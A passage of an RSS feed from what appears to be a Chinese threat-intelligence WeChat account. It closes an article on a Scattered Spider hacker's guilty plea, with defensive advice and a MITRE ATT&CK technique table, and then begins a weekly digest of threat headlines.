leaf="">完善加密货币钱包管理规范，使用硬件钱包存储大额资产</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">定期审计第三方服务商的安全状况，特别是云通信提供商</span></p></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">监控层面：</span></strong></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">部署威胁情报平台，追踪与&#34;The Com&#34;相关的攻击活动</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">建立Telegram频道和地下论坛监控机制</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">对员工个人信息泄露进行持续监测</span></p></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结论与后续跟踪</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Tyler Buchanan的认罪标志着Scattered Spider组织面临的重大打击，但考虑到该组织成员的年轻化特征和社区化运作模式，其活动不会因此终止。奇安信威胁情报中心将持续跟踪该组织的后续发展，重点关注：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">Buchanan的量刑结果及其可能的协助执法行动</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">其余三名被告的审判进展</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">Scattered Spider组织的战术调整和能力演进</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">与勒索软件组织的协作深化程度</span></p></li></ol><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国内企业和机构应以此案为契机，全面审视自身安全防护体系中对社工攻击和SIM交换攻击的抵御能力，特别是在多因素认证和移动设备安全领域。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">技术附录：相关MITRE ATT&amp;CK技术映射</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术ID</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术名称</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">Scattered Spider使用情况</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1566</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">网络钓鱼</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">短信钓鱼、钓鱼工具包</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1566.002</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">鱼叉式钓鱼链接</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">定制化钓鱼内容</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1649</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">盗窃或伪造身份证明文件</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">SIM交换攻击</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1078.004</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">有效账户：云账户</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">使用窃取凭证访问企业系统</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1098</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">账户操作</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用窃取的PII进行账户恢复</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1556.002</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">修改认证流程：密码哈希同步</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">尝试同步认证令牌</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1071.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">应用层协议：Web协议</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">C2通信、Telegram数据通道</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">[1].<a href="https://www.securityweek.com/british-scattered-spider-hacker-pleads-guilty-in-the-us/" target="_blank">https://www.securityweek.com/british-scattered-spider-hacker-pleads-guilty-in-the-us/</a></span></p><div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;padding-left: 0px;padding-right: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="will-change: transform;box-sizing: border-box;"><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="gif" data-w="480" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034851" src="https://wechat2rss.xlab.app/img-proxy/?k=b51d23b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8kiahmLJ6XehRibdurY5NpYwJxlEVFjmFGFxUUbnN3hFhX08jwDObP1PvekrhYtI5S6Y2GwpWicgerUobMF4P5lk7m9kBRiao7wg8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.1</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=62b240dd&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518549%26idx%3D1%26sn%3D2041f78684b77509a06560c6afd65c00">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 27 Apr 2026 14:43:00 +0800</pubDate>
    </item>
    <item>
      <title>每周高级威胁情报解读(2026.04.17~04.23)</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518546&amp;idx=1&amp;sn=cec3e7e78a12edb9669b75629b7b3888</link>
      <description>Lazarus 从 Kelp DAO 窃取了 2.9 亿美元；SideWinder 使用伪造的 Chrome PDF 查看器和 Zimbra 克隆程序窃取政府网络邮箱凭证；疑似APT-C-13（Sandworm）组织利用SSH+TOR隧道实现隐蔽持久化的攻击活动分析</description>
      <content:encoded><![CDATA[<p><span>威胁情报中心</span> <span>2026-04-24 11:56</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=e5d3840b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqib7jl7icVUZ2vtP081c9yHvVk13x50mvJCR2KEbhLwYShHU7GuImMaSLcuEibqaEqvK6CCu6mKlqbKcM8zQQUYQ0GicHW39XhtGA4%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>Lazarus 从 Kelp DAO 窃取了 2.9 亿美元；SideWinder 使用伪造的 Chrome PDF 查看器和 Zimbra 克隆程序窃取政府网络邮箱凭证；疑似APT-C-13（Sandworm）组织利用SSH+TOR隧道实现隐蔽持久化的攻击活动分析</p>
  <div style="font-size: 15px;line-height: 1.75;letter-spacing: 1px;padding-right: 0px;padding-left: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;box-sizing: border-box;"><p style="display: inline-block;box-sizing: border-box;"><span style="display: block;padding: 0.3em 0.5em;border-radius: 0.8em 0.8em 0px 0px;background-color: rgb(55, 113, 187);color: rgb(255, 255, 255);box-sizing: border-box;" title=""><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026.04.17~04.23</span></p></span></p><div style="border: 1px solid rgb(55, 113, 187);border-radius: 0px 0px 0.8em 0.8em;padding: 10px;box-sizing: border-box;"><div style="line-height: 1.75;text-align: justify;font-size: 14px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击团伙情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Lazarus 从 Kelp DAO 窃取了 2.9 亿美元</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SideWinder 使用伪造的 Chrome PDF 查看器和 Zimbra 克隆程序窃取政府网络邮箱凭证</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">疑似APT-C-13（Sandworm）组织利用SSH+TOR隧道实现隐蔽持久化的攻击活动分析</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Void Dokkaebi 利用受感染的开发者代码库作为恶意软件传播渠道</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Lazarus 使用“Mach-O Man”macOS 恶意软件工具包攻击企业</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Harvester组织利用新的 GoGra Linux 后门扩展工具集</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击行动或事件情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者会冒充 IT 或技术支持人员实施数据窃取</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者利用macOS原生功能实现“离地”攻击</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">伪装成TikTok视频下载器的扩展程序窃取13万用户数据</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">又又一起AI相关供应链事件：Xinference PyPI (版本 2.6.0–2.6.2)供应链污染报告</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">PhantomCLR 行动：通过应用程序域劫持和内存中 .NET 滥用进行隐蔽执行</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意代码情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Gentlemen 勒索软件与SystemBC：代理背后的秘密</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">新的 NGate 变种隐藏在合法安卓应用程序中</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Lotus Wiper：针对能源和公用事业领域的新威胁</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究人员发现 DinDoor 后门 20 台活跃的 C2 服务器</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞情报</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Oracle 2026年4月补丁日多产品高危漏洞安全风险通告</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Claude Mythos AI 模型发现 Firefox 中存在 271 个零日漏洞</span></p></li></ul></div></div></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034865" src="https://wechat2rss.xlab.app/img-proxy/?k=56defb5c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8XFkiacz5XXklg8XuofibhZ1VvUrvbL24d4MZOKPO2kjZRPhDy8ic7sGKFVDRSJs6ydptzJXOI0tchCMc2tW3Zme1N4RQGVcfAJ8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034866" src="https://wechat2rss.xlab.app/img-proxy/?k=df712408&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8uymozUVibFqKFIicyknmIAW5EqQbTayhvxkjqj6TC2HdiclTQicKJSEiaPO7BBicrwdNQdsyickYdyCE6ZuClcukjDSzUFzj7RV70Y8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击团伙情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034863" 